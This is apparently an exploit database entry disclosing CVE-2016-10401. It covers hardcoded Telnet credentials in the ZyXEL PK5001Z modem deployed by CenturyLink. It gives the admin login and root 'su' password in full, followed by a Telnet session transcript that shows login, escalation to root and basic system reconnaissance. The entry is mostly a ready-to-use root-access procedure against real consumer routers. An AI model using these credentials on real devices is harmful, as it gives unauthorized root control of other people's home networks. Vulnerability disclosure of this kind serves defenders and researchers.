# Exploit Title: ZyXEL PK5001Z Modem - CenturyLink Hardcoded admin and root Telnet Password. # Google Dork: n/a # Date: 2017-10-31 # Exploit Author: Matthew Sheimo # Vendor Homepage: https://www.zyxel.com/ # Software Link: n/a # Version: PK5001Z 126.96.36.199 # Tested on: Linux # About: ZyXEL PK5001Z Modem is used by Century Link a global communications and IT services company focused on connecting its customers to the power of the digital world. # Linked CVE's: CVE-2016-10401 Hardcoded password for ZyXEL PK5001Z Modem, login with the following credentials via Telnet username: admin password: CenturyL1nk Escalate to root with 'su' and this password. password: zyad5001 [root:/]# telnet 192.168.0.1 Trying 192.168.0.1... Connected to 192.168.0.1. Escape character is '^]'. PK5001Z login: admin Password: CenturyL1nk $ whoami admin_404A03Tel $ su Password: zyad5001 # whoami root # uname -a Linux PK5001Z 188.8.131.52 #54 Wed Oct 14 11:17:48 CST 2015 mips unknown # cat /etc/zyfwinfo Vendor Name: ZyXEL Communications Corp.
Related ExploitsTrying to match CVEs (1): CVE-2016-10401
Other Possible E-DB Search Terms: ZyXEL PK5001Z Modem